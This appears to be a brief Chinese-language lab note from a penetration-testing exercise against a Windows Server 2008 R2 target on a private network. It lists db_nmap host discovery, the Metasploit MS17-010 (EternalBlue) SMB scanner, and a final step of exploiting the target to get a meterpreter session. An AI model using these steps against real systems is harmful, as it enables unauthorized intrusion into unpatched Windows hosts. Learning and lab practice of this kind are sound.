靶机:Windows Server 2008 R2 192.168.11.134
kali机器:192.168.11.106
探测当前局域网内哪些主机存活:
db_nmap 192.168.11.0/24 --exclude 192.168.11.1,192.168.11.106
#
--exclude排除网关与自身,多个之间以逗号分隔
hosts显示存活的主机:
检测这些存活的主机是否存在漏洞:
use auxiliary/scanner/smb/smb_ms17_010
hosts -R
#
Set RHOSTS from the results of the search,即将上述扫描到的存活主机设置为RHOSTS参数
对192.168.11.134这台靶机执行
ms17_010漏洞(永恒之蓝):
run,进入meterpreter会话: